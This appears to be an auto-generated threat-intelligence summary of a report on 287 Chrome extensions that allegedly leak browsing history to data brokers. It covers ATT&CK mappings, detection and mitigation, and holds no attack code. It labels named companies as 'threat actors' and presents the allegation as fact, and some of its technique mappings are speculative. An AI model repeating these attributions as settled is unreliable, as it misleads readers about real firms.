Full Report
Add-ons with 37M installs leak visited URLs to 30+ recipients, researcher says They know where you've been and they're going to share it. A security researcher has identified 287 Chrome extensions that allegedly exfiltrate browsing history data for an estimated 37.4 million installations.…
Analysis Summary
# Tool/Technique: Leaking Chrome Extensions (Data Exfiltration Mechanism)
## Overview
A collection of 287 identified Chrome browser extensions that covertly exfiltrate sensitive user browsing history data to numerous third-party recipients, including data brokers. The primary purpose is unauthorized data harvesting for commercial resale.
## Technical Details
- Type: Technique (Exploitation of browser extension trust model) / Malware (specifically, malicious code embedded in legitimate-appearing software)
- Platform: Google Chrome browser (Desktop application) extensions ecosystem.
- Capabilities: Collection and exfiltration of visited URLs (browsing history).
- First Seen: The article context implies this is a longstanding concern, referencing research dating back to 2017, with specific recent findings documented by "Q Continuum" in early 2026.
## MITRE ATT&CK Mapping
While the primary activity falls under data exfiltration, the insertion and operation within an extension context maps to:
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel (Data is generally sent out to specified recipients via network channels)
- TA0005 - Defense Evasion
- T1564.003 - Hide Artifacts: Hidden Files and Directories (If data staging occurs, though not explicitly stated, the camouflage is key)
- TA0001 - Initial Access
- T1204.002 - User Execution: Malicious File (Users willingly install the extension)
## Functionality
### Core Capabilities
- **Data Collection:** Monitoring and recording of the user's browsing history (websites visited).
- **Data Dissemination:** Sending the collected browsing history data to over 30 identified third-party recipients/data brokers.
- **Deception:** Masquerading as seemingly "harmless tools" while requesting excessive permissions necessary for surveillance.
### Advanced Features
- **Commercialization Focus:** The exfiltrated data is specifically noted to be sold to large corporate entities, including data brokers like Similarweb, Big Star Labs, Semrush, etc.
- **Obscured Consent:** Data harvesting practices are intentionally obscured within privacy policies, leading to users consenting without full awareness.
- **Scale:** Affecting an estimated 37.4 million installations across the 287 identified extensions.
## Indicators of Compromise
*Note: Specific non-defanged domains/IPs are not provided in the article, so environmental and behavioral indicators are prioritized.*
- File Hashes: N/A (Relates to numerous extension packages)
- File Names: N/A (Specific extension names are not listed)
- Registry Keys: N/A (Platform specific to browser storage)
- Network Indicators: Data exfiltration traffic directed towards domains associated with data aggregation companies (e.g., Similarweb, Alibaba Group, ByteDance infrastructure). *These domains must be identified via reverse engineering the extensions or network monitoring.*
- Behavioral Indicators: Extensions requesting or utilizing `history` or broad host permissions that communicate outbound data consistently after navigation events.
## Associated Threat Actors
The activity appears driven by financially motivated entities seeking to profit from user data, including:
- Data Brokers (e.g., Similarweb, Big Star Labs (seen as an arm of Similarweb)).
- Other Commercial Entities (e.g., Semrush, Alibaba Group, ByteDance).
- The developers/vendors of the specific 287 malicious extensions.
## Detection Methods
- Signature-based detection: Identifying known malicious network destinations used by the known data aggregators listed.
- Behavioral detection: Monitoring for extensions performing extensive, regular outbound network connections immediately following page load events or based on background scripts, especially if these connections appear to transmit session or navigation data.
- YARA rules: Not applicable to the *extension* itself, but could be created for file contents if the background processing scripts were analyzed offline.
## Mitigation Strategies
- **User Awareness:** Educating users on the risks of free software and the permissions granted to browser extensions.
- **Policy Enforcement:** Utilizing Google's Chrome Web Store Limited Use policy robustly to prevent exceptions that allow data broker collection.
- **Application Control:** Implementing enterprise policies to restrict the installation of non-mandated or non-vetted Chrome extensions.
- **Proxy/Network Monitoring:** Analyzing outbound traffic from user agents identifying as Chrome/browser processes looking for connections to known data brokers or unusual high-volume destinations.
## Related Tools/Techniques
- Previous findings regarding other extensions capturing chatbot conversations.
- Research on generative AI extensions capturing sensitive user data (March 2025 findings mentioned).
- Ex-Ray: Detection of History-Leaking Browser Extensions (The underlying research methodology Q Continuum built upon).